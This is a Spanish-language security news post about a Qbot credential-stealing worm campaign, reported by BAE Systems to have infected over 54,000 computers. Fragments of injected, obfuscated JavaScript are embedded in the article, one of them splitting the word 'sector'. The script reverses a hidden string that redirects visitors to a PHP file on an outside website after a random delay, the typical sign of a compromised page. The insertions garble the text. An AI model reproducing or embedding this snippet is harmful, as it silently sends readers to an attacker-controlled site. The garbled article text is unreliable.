VUELVE QBOT: NUEVA OLA DE MALWARE QUE ROBA INFORMACIÓN AFECTA A 54 MIL EQUIPOS
Investigadores de seguridad han detectado una nueva ola de propagación de Qbot que, en sus intentos de robar información, es “más difícil de detectar e interceptar”. Se trata de un gusano con capacidades de backdoor diseñado para recolectar credenciales de los sistemas que infecta, los cuales en la mayoría de los casos se convierten en parte de una botnet.
Según un detallado reporte de BAE systems, el malware ya infectó a más de 54 mil computadoras en miles de organizaciones. Las soluciones de seguridad de ESET detectan a esta amenaza como Win32/Qbot y Win32/Kryptik.
Se han hecho varias actualizaciones al Qbot original, incluyendo un código “polimórfico y que cambia de forma”, que lo hace más difícil de detectar. Como señala IT Pro, el malware también puede detectar si está siendo observado en un sandbox, una herramienta usada por investigadores para detectar amenazas antes de que puedan causar daño a los usuarios.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tock_347785832-623×410.jpg” alt=”” width=”623″ height=”410″ /></p>
<p>Un equipo de respuesta a incidentes de la compañía descubrió la nueva versión a principios de 2016, cuando 500 computadoras pertenecientes a organizaciones del sec<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tor público (cuyos nombres no fueron revelados) se infectaron. Los cibercriminales apuntaron específicamente aorganizaciones públicas como departamentos de policía, hospitales y universidades.
Pero a pesar de la potencia de esta nueva versión, no era compatible con versiones antiguas de Windows, por lo que varias computadoras que todavía usan Windows XP dieron la señal de que algo extraño estaba ocurriendo, y sirvieron para encontrar a Qbot. Dentro de la red en cuestión, los investigadores se encontraron con una botnet conformada por 54.517 máquinas, el 85% de ellas ubicadas en los Estados Unidos.
Adrian Nish, jefe de Inteligencia en BAE Systems, explicó:
Muchas organizaciones del sector público son responsables de operar infraestructura y servicios críticos, a menudo con presupuestos limitados, volviéndose un blanco principal de ataques.
En esta instancia, los criminales tropezaron porque unas pocas computadoras desactualizadas estaban haciendo que el código malicioso las colapsara, en vez de infectarlas. Fue esta serie de interrupciones que alertó a la organización sobre el problema que se estaba propagando.
Dado que Qbot se seguirá propagando, se recomienda a las empresas actualizar sus sistemas y gestionar la seguridad en forma integral para cerrar la puerta a posibles ataques.
Ver información original al respecto en Fuente:
http://noticiasseguridad.com/seguridad-informatica/vuelve-qbot-nueva-ola-de-malware-que-roba-informacion-afecta-54-mil-equipos/
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.